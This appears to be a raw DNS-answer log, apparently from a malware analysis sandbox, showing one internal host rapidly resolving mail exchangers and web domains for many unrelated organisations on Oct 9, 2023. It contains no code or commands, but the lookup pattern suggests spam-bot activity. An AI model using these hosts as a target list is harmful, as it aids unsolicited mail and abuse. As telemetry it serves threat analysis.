                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.695389986 CEST97.74.104.45192.168.2.30xc522No error (0)mail.tspl-india.com68.178.145.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.696461916 CEST74.124.210.242192.168.2.30xc522No error (0)juliemusic.com23.235.200.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.699371099 CEST1.1.1.1192.168.2.30x6e3No error (0)slns1.namespro.ca67.228.254.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.855197906 CEST217.220.57.131192.168.2.30xc522No error (0)mail.4uservizi.net151.8.211.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.874767065 CEST67.228.254.4192.168.2.30xcc8No error (0)bc.dmgarch.com207.134.236.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.881700993 CEST108.162.192.59192.168.2.30x745aNo error (0)_dc-mx.70705847217d.antiochgolfclub.com192.185.16.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.916641951 CEST148.163.128.50192.168.2.30xa3a8No error (0)mxb-00013f02.gslb.pphosted.com208.86.201.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.919013023 CEST162.159.24.198192.168.2.30xeb9cNo error (0)optimagroupinc.com.2.0001.arsmtp.com8.31.233.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.946237087 CEST162.159.24.198192.168.2.30xa325No error (0)aqua--aerobic-com.mx1.arsmtp.com8.31.233.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.946454048 CEST64.98.148.137192.168.2.30x5362No error (0)mx.livejournali.com108.61.164.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.038023949 CEST150.214.5.83192.168.2.30x73b0No error (0)buzon.us.es193.147.175.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.048150063 CEST195.29.150.3192.168.2.30xcf77No error (0)mx01.t-com.hr195.29.150.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.051558971 CEST1.1.1.1192.168.2.30xee3cNo error (0)dns01.manitu.net217.11.48.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.247109890 CEST104.47.118.145192.168.2.30x8be7No error (0)dgaccountants-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.247109890 CEST104.47.118.145192.168.2.30x8be7No error (0)dgaccountants-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.249051094 CEST104.47.118.145192.168.2.30x4ff1No error (0)sabrain-com.mail.protection.outlook.com104.47.51.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.249051094 CEST104.47.118.145192.168.2.30x4ff1No error (0)sabrain-com.mail.protection.outlook.com104.47.51.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.271655083 CEST148.163.128.50192.168.2.30x9bbaNo error (0)mxa-00137005.gslb.pphosted.com205.220.164.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275542021 CEST50.31.146.159192.168.2.30xc30aNo error (0)vizi0n.com50.31.160.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275733948 CEST104.47.118.145192.168.2.30x6bc2No error (0)doublea1991-com.mail.protection.outlook.com52.101.137.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275733948 CEST104.47.118.145192.168.2.30x6bc2No error (0)doublea1991-com.mail.protection.outlook.com52.101.137.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275733948 CEST104.47.118.145192.168.2.30x6bc2No error (0)doublea1991-com.mail.protection.outlook.com52.101.132.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275733948 CEST104.47.118.145192.168.2.30x6bc2No error (0)doublea1991-com.mail.protection.outlook.com52.101.132.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275988102 CEST104.47.118.145192.168.2.30x47c8No error (0)hlag-com.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275988102 CEST104.47.118.145192.168.2.30x47c8No error (0)hlag-com.mail.protection.outlook.com52.101.73.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275988102 CEST104.47.118.145192.168.2.30x47c8No error (0)hlag-com.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275988102 CEST104.47.118.145192.168.2.30x47c8No error (0)hlag-com.mail.protection.outlook.com52.101.73.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275988102 CEST104.47.118.145192.168.2.30x47c8No error (0)hlag-com.mail.protection.outlook.com52.101.73.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275988102 CEST104.47.118.145192.168.2.30x47c8No error (0)hlag-com.mail.protection.outlook.com52.101.73.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.275988102 CEST104.47.118.145192.168.2.30x47c8No error (0)hlag-com.mail.protection.outlook.com52.101.73.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.299247026 CEST137.118.1.28192.168.2.30xcb06No error (0)evertek-net.mx.av-mx.com150.136.204.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.301079988 CEST207.55.253.5192.168.2.30xdfacNo error (0)icandi.com66.84.6.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.306652069 CEST70.39.150.2192.168.2.30x83beNo error (0)correiaecorreia.pt23.235.198.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.371805906 CEST217.11.48.200192.168.2.30xa3e3No error (0)mail.lieblingslied-records.de217.11.48.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.406873941 CEST1.1.1.1192.168.2.30x2265No error (0)ns4754.eukns.com158.255.46.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.583271980 CEST1.1.1.1192.168.2.30x6bc1Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.583359957 CEST1.1.1.1192.168.2.30x64b3No error (0)use1.akam.net72.246.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607100010 CEST104.47.118.145192.168.2.30xdb2dNo error (0)littlebrown-co-uk.mail.protection.outlook.com52.101.73.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607100010 CEST104.47.118.145192.168.2.30xdb2dNo error (0)littlebrown-co-uk.mail.protection.outlook.com52.101.73.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607100010 CEST104.47.118.145192.168.2.30xdb2dNo error (0)littlebrown-co-uk.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607100010 CEST104.47.118.145192.168.2.30xdb2dNo error (0)littlebrown-co-uk.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607100010 CEST104.47.118.145192.168.2.30xdb2dNo error (0)littlebrown-co-uk.mail.protection.outlook.com52.101.68.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607100010 CEST104.47.118.145192.168.2.30xdb2dNo error (0)littlebrown-co-uk.mail.protection.outlook.com52.101.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607100010 CEST104.47.118.145192.168.2.30xdb2dNo error (0)littlebrown-co-uk.mail.protection.outlook.com52.101.68.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.722660065 CEST158.255.46.156192.168.2.30xf329No error (0)plumlogo.co.uk158.255.46.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.757193089 CEST72.246.46.64192.168.2.30xeba6No error (0)mx1.hc741-6.eu.iphmx.com23.90.110.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.757193089 CEST72.246.46.64192.168.2.30xeba6No error (0)mx1.hc741-6.eu.iphmx.com23.90.105.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.781253099 CEST104.47.118.145192.168.2.30xeba6No error (0)fsrinc-com.mail.protection.outlook.com104.47.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.781253099 CEST104.47.118.145192.168.2.30xeba6No error (0)fsrinc-com.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.784975052 CEST148.163.128.50192.168.2.30xeba6No error (0)mxb-00168f01.gslb.pphosted.com67.231.156.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.823028088 CEST209.191.199.72192.168.2.30xeba6No error (0)filtermx10.paulbunyan.net209.191.220.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.823028088 CEST209.191.199.72192.168.2.30xeba6No error (0)filtermx10.paulbunyan.net209.191.220.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.910672903 CEST85.115.52.190192.168.2.30x8a0cNo error (0)cust60576-1.in.mailcontrol.com208.87.233.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.940574884 CEST185.128.227.170192.168.2.30x8a0cNo error (0)nusantaramotor.com185.128.227.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.973804951 CEST1.1.1.1192.168.2.30x8981No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.050313950 CEST1.1.1.1192.168.2.30xd9ecNo error (0)dns2.iper.net94.236.27.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.111495972 CEST1.1.1.1192.168.2.30x9b96No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.216794968 CEST205.251.193.44192.168.2.30xd732No error (0)em4.rejecthost.com165.22.205.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.228396893 CEST1.1.1.1192.168.2.30x414dNo error (0)chad.ns.cloudflare.com108.162.193.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.228396893 CEST1.1.1.1192.168.2.30x414dNo error (0)chad.ns.cloudflare.com172.64.33.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.228396893 CEST1.1.1.1192.168.2.30x414dNo error (0)chad.ns.cloudflare.com173.245.59.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.250052929 CEST148.163.128.50192.168.2.30xd732No error (0)mxa-002ece01.gslb.pphosted.com148.163.143.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251668930 CEST104.47.118.145192.168.2.30xd732No error (0)rxlps-com.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251668930 CEST104.47.118.145192.168.2.30xd732No error (0)rxlps-com.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251668930 CEST104.47.118.145192.168.2.30xd732No error (0)rxlps-com.mail.protection.outlook.com52.101.40.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251668930 CEST104.47.118.145192.168.2.30xd732No error (0)rxlps-com.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251668930 CEST104.47.118.145192.168.2.30xd732No error (0)rxlps-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251668930 CEST104.47.118.145192.168.2.30xd732No error (0)rxlps-com.mail.protection.outlook.com52.101.40.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251668930 CEST104.47.118.145192.168.2.30xd732No error (0)rxlps-com.mail.protection.outlook.com52.101.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.297456026 CEST192.252.149.15192.168.2.30xd732No error (0)mail.antares-design.com192.252.149.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.359594107 CEST94.236.27.107192.168.2.30xd732No error (0)mail.riminireservation.it2.229.120.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.393850088 CEST108.162.193.82192.168.2.30xbb1dNo error (0)mail.i3p.it93.57.17.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.394690037 CEST190.228.29.45192.168.2.30xd732No error (0)mx4.lectotum.com190.228.29.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.426765919 CEST205.251.192.187192.168.2.30x56a4No error (0)mx1.veeam.com216.253.77.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.443197012 CEST104.47.118.145192.168.2.30xa6f0No error (0)ovam-be.mail.protection.outlook.com52.101.68.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.443197012 CEST104.47.118.145192.168.2.30xa6f0No error (0)ovam-be.mail.protection.outlook.com52.101.73.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.443197012 CEST104.47.118.145192.168.2.30xa6f0No error (0)ovam-be.mail.protection.outlook.com52.101.68.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.443197012 CEST104.47.118.145192.168.2.30xa6f0No error (0)ovam-be.mail.protection.outlook.com52.101.73.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.443197012 CEST104.47.118.145192.168.2.30xa6f0No error (0)ovam-be.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.443197012 CEST104.47.118.145192.168.2.30xa6f0No error (0)ovam-be.mail.protection.outlook.com52.101.73.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.443197012 CEST104.47.118.145192.168.2.30xa6f0No error (0)ovam-be.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.446609974 CEST148.163.128.50192.168.2.30x6afaNo error (0)mxb-0019f502.gslb.pphosted.com67.231.151.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.450884104 CEST104.47.118.145192.168.2.30x2206No error (0)buildness-pt.mail.protection.outlook.com104.47.17.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.450884104 CEST104.47.118.145192.168.2.30x2206No error (0)buildness-pt.mail.protection.outlook.com104.47.18.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.460861921 CEST217.160.82.32192.168.2.30xa6f0No error (0)getlostxx.com74.208.158.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.479429960 CEST206.51.128.55192.168.2.30xa6f0No error (0)mail.nktelco.net206.51.143.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru176.99.13.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru176.99.13.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru176.99.13.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru176.99.13.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru194.58.117.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru194.58.117.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru194.58.117.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru194.58.117.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru194.67.73.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.615920067 CEST1.1.1.1192.168.2.30x5f6No error (0)ns1.reg.ru194.67.73.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.811954975 CEST104.47.118.145192.168.2.30x5280No error (0)scicom-com.mail.protection.outlook.com52.101.11.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.811954975 CEST104.47.118.145192.168.2.30x5280No error (0)scicom-com.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.811954975 CEST104.47.118.145192.168.2.30x5280No error (0)scicom-com.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.811954975 CEST104.47.118.145192.168.2.30x5280No error (0)scicom-com.mail.protection.outlook.com52.101.11.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.811954975 CEST104.47.118.145192.168.2.30x5280No error (0)scicom-com.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.811954975 CEST104.47.118.145192.168.2.30x5280No error (0)scicom-com.mail.protection.outlook.com52.101.8.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.811954975 CEST104.47.118.145192.168.2.30x5280No error (0)scicom-com.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.868911982 CEST1.1.1.1192.168.2.30x6452No error (0)araax.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.868911982 CEST1.1.1.1192.168.2.30x6452No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.868911982 CEST1.1.1.1192.168.2.30x6452No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.868911982 CEST1.1.1.1192.168.2.30x6452No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.878693104 CEST1.1.1.1192.168.2.30x2906No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.971184969 CEST176.99.13.11192.168.2.30xb270No error (0)mail.gtdel.net176.118.23.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.066932917 CEST1.1.1.1192.168.2.30xd903Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.096797943 CEST1.1.1.1192.168.2.30x37ddNo error (0)ns1.iserv.eu116.202.2.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.286789894 CEST1.1.1.1192.168.2.30x9822No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.286789894 CEST1.1.1.1192.168.2.30x9822No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.303366899 CEST162.159.24.198192.168.2.30x22e2No error (0)icci.us.1.arsmtp.com8.19.118.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.339463949 CEST54.85.148.174192.168.2.30x26e4No error (0)tcmri.com96.253.18.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.397696972 CEST1.1.1.1192.168.2.30xf11eNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.397696972 CEST1.1.1.1192.168.2.30xf11eNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.397696972 CEST1.1.1.1192.168.2.30xf11eNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.405273914 CEST1.1.1.1192.168.2.30x8c0aNo error (0)ns1.terrakom.hr176.62.8.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.421865940 CEST116.202.2.219192.168.2.30x8aa7No error (0)gybond.de141.91.210.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.603666067 CEST104.47.118.145192.168.2.30x2b32No error (0)burke-org.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.603666067 CEST104.47.118.145192.168.2.30x2b32No error (0)burke-org.mail.protection.outlook.com104.47.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.753009081 CEST1.1.1.1192.168.2.30x6027No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.754362106 CEST176.62.8.3192.168.2.30x7326No error (0)mail.clubadriatic.com85.94.71.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.883125067 CEST1.1.1.1192.168.2.30xd6fcName error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.103208065 CEST1.1.1.1192.168.2.30xec97No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.457117081 CEST1.1.1.1192.168.2.30xa3a3Name error (3)kayoaiba.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.462944984 CEST1.1.1.1192.168.2.30xbc97Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.503671885 CEST1.1.1.1192.168.2.30xc0c9No error (0)ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.503671885 CEST1.1.1.1192.168.2.30xc0c9No error (0)ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.893547058 CEST1.1.1.1192.168.2.30x7818No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.527833939 CEST1.1.1.1192.168.2.30xb82eName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.834247112 CEST1.1.1.1192.168.2.30x9323Server failure (2)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.102.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.110.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.178.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.106.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.80.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.93.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.94.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.873958111 CEST1.1.1.1192.168.2.30x2d4fNo error (0)assideum.com52.219.109.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.001569033 CEST1.1.1.1192.168.2.30x816fNo error (0)ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.001569033 CEST1.1.1.1192.168.2.30x816fNo error (0)ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.324496984 CEST1.1.1.1192.168.2.30xd3a8No error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.324496984 CEST1.1.1.1192.168.2.30xd3a8No error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.346255064 CEST1.1.1.1192.168.2.30xb796Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.397778988 CEST1.1.1.1192.168.2.30x17d9Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.810483932 CEST1.1.1.1192.168.2.30xe8fdName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.816014051 CEST1.1.1.1192.168.2.30x67b8No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.971770048 CEST1.1.1.1192.168.2.30xab51No error (0)mondopp.net34.67.9.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:07.192637920 CEST1.1.1.1192.168.2.30xdec5No error (0)aluminox.es94.23.84.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:07.636255026 CEST1.1.1.1192.168.2.30xd53eName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:07.983097076 CEST1.1.1.1192.168.2.30xbfdeNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
